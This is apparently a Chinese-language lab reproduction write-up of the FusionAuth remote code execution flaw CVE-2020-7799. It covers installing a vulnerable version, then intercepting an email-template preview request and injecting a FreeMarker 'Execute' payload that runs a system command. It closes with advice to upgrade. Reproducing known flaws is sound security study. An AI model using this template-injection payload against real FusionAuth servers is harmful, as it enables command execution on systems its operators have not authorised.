FusionAuthRCE(CVE-2020-7799)复现

简介

FusionAuth是一个免费的身份管理平台,安装简单,易于集成。FusionAuth提供登录、注册、MFA、SSO、电子邮件模板、本地化、密码控制、强哈希、网络挂钩、基于角色的访问控制等功能。

影响版本

FusionAuth <= 1.11.0

环境搭建

下载 FusionAuth 1.10.0

wget https://storage.googleapis.com/inversoft_products_j098230498/products/fusionauth/1.10.0/fusionauth-app-1.10.0.zip

FusionAuthRCE(CVE-2020-7799)复现_第1张图片

wget https://www.elastic.co/cn/downloads/past-releases/elasticsearch-6-8-6

启动 MySQL /etc/init.d/mysql start

启动 ElasticSearch systemctl start elasticsearch.service

启动 FusionAuth bin/startup.sh

FusionAuthRCE(CVE-2020-7799)复现_第2张图片

FusionAuthRCE(CVE-2020-7799)复现_第3张图片

http://Your-ip:9011打开网站

FusionAuthRCE(CVE-2020-7799)复现_第4张图片

配置 FusionAuth

FusionAuthRCE(CVE-2020-7799)复现_第5张图片

配置 Elastic Search

FusionAuthRCE(CVE-2020-7799)复现_第6张图片

FusionAuthRCE(CVE-2020-7799)复现_第7张图片

FusionAuthRCE(CVE-2020-7799)复现_第8张图片

FusionAuthRCE(CVE-2020-7799)复现_第9张图片

漏洞复现

进入 setting -> email template

然后编辑

FusionAuthRCE(CVE-2020-7799)复现_第10张图片

点击 Preview,抓包

FusionAuthRCE(CVE-2020-7799)复现_第11张图片

修改
emailTemplate.defaultHtmlTemplate
为
${"freemarker.template.utility.Execute"?new()("id")}

FusionAuthRCE(CVE-2020-7799)复现_第12张图片

FusionAuthRCE(CVE-2020-7799)复现_第13张图片

修复建议

升级到最新版

你可能感兴趣的:(安全)